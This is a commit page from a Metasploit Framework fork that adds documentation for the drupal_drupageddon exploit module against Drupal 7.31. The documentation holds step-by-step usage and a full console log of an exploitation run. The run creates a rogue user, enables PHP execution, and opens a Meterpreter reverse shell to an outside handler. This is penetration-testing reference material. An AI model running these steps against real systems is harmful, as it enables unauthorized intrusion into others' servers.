dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #7322, drupal_drupageddon module docs

This commit is contained in:
William Vu 2016-09-16 00:40:18 -05:00
parent b21daa7019 a9502bfe9e
commit 030e09c9c6
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 57 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
documentation/modules/exploit/multi/http/drupal_drupageddon.md Normal file
View File

@ -0,0 +1,57 @@
## Vulnerable Application
Drupal 7.31 official [download](https://ftp.drupal.org/files/projects/drupal-7.31.tar.gz)
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/drupal_drupageddon`
4. Do: `set rhost <ip>`
5. Do: `run`
6. You should get a shell.
## Scenarios
This is a run against a Drupal 7.31 linux box.
```
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon)
msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(drupal_drupageddon) > set verbose true
verbose => true
msf exploit(drupal_drupageddon) > exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Testing page
[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
[*] form_token:
[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
[*] Creating new user AaCaUlLaPR:AAgeAAAAjA
[*] Logging in as AaCaUlLaPR:AAgeAAAAjA
[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
[*] Trying to parse enabled modules
[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
[*] Enabling the PHP filter module
[*] Setting permissions for PHP filter module
[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
[*] admin role id: 3
[*] Getting tokens from create new article page
[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
[*] Calling preview page. Exploit should trigger...
[*] Sending stage (33721 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400
meterpreter > sysinfo
Computer : drupal
OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: apache (48)
```